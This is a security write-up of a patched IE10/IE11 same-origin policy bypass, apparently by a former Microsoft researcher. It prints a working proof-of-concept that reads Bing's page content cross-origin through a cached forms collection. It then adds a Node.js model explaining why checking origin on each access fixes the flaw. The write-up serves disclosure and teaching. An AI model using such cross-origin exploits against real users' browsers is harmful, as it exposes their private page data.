If you know the name of a form element on the target page, you can access that element’s ownerDocument after a redirect by caching the forms collection before the redirect and then looking up the named form afterward. Bing uses a form called sb_form, which made it a convenient target for demonstrating this technique.
var _forms;

function main() {
    // Open a same-origin page that will redirect to the target (Bing).
    var win = window.open("redirect.aspx", "", "width=400,height=400");
    // Keep the popup busy so the redirect lands while the timer below runs.
    win.setTimeout('alert("Please, don\'t close this alert");');
    win.document.appendChild(win.document.createElement("form"));
    _forms = win.document.forms; // Save a reference to the forms collection.
    setTimeout("accessFormsCollection()", 2000); // Wait for the redirect to finish.
}

function accessFormsCollection() {
    try {
        alert(_forms); // Direct access throws once the popup is cross-origin.
    } catch (e) {
        // The named form on the cached collection still resolves, and its
        // ownerDocument is the cross-origin document.
        alert(_forms.sb_form.ownerDocument.URL + "\n\n" +
              _forms.sb_form.ownerDocument.body.innerText);
    }
}
The first access to _forms throws an exception; the catch block accesses _forms.sb_form — the named form from Bing’s page — and from there navigates to ownerDocument, giving full DOM access. Tested on IE10 / IE11 build 20130312-2100.
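The root cause is a design point rather than a single missed line: a live collection handed out while the popup was same-origin kept working after the popup navigated, because the origin check was not repeated on each named lookup. The following is an added example, not code from the original post or from any browser, that models that distinction in plain Node.js. Everything in it (the Win and document objects, the origin strings, the form name "search", the two lookup strategies) is a constructed assumption for illustration.

```javascript
// Added example (not from the original post): a toy model of why a cached live
// collection must re-check origin on every access, not only when it is created.
// Nothing here is browser code; all names and origins are constructed.

class SecurityError extends Error {
  constructor(msg) { super(msg); this.name = "SecurityError"; }
}

// A minimal "document": a URL, its origin, and the named forms it contains.
function makeDocument(url, formNames) {
  const doc = { URL: url, origin: new URL(url).origin, forms: {} };
  for (const name of formNames) {
    doc.forms[name] = { name, ownerDocument: doc };
  }
  return doc;
}

// A window whose document (and therefore origin) is swapped on navigation.
class Win {
  constructor(url, formNames) { this.document = makeDocument(url, formNames); }
  navigate(url, formNames) { this.document = makeDocument(url, formNames); }
}

// Flawed design: the origin check runs once, when the collection is handed out.
// Later named lookups trust the cached reference and reach whatever document
// the window holds at that moment.
function formsCheckedAtCapture(accessorOrigin, win) {
  if (win.document.origin !== accessorOrigin) {
    throw new SecurityError("blocked at capture");
  }
  return { item: (name) => win.document.forms[name] };
}

// Hardened design: the collection stays live, but every named lookup re-checks
// the accessor's origin against the window's *current* document.
function formsCheckedAtAccess(accessorOrigin, win) {
  return {
    item: (name) => {
      if (win.document.origin !== accessorOrigin) {
        throw new SecurityError("blocked at access: " + win.document.origin);
      }
      return win.document.forms[name];
    },
  };
}

// The post's sequence, modelled: the opener caches the collection while the
// popup is same-origin, then the popup navigates to a different origin that
// contains a named form. Returns what the opener ends up seeing.
function runScenario(getForms) {
  const openerOrigin = "https://opener.example";
  const win = new Win("https://opener.example/redirect.aspx", []);
  const cached = getForms(openerOrigin, win); // same-origin here, so it succeeds
  win.navigate("https://other.example/", ["search"]);
  try {
    const form = cached.item("search");
    return { leaked: true, url: form.ownerDocument.URL };
  } catch (e) {
    return { leaked: false, error: e.name };
  }
}

console.log(runScenario(formsCheckedAtCapture)); // { leaked: true, url: 'https://other.example/' }
console.log(runScenario(formsCheckedAtAccess));  // { leaked: false, error: 'SecurityError' }
```

Run it with `node` and compare the two lines: the capture-time check lets the cached reference follow the window across origins, while the access-time check fails closed against the document that is actually there. This is also the check that makes the post's try/catch trick moot, since a SecurityError is raised by the named lookup itself rather than only by the first, direct access.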
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.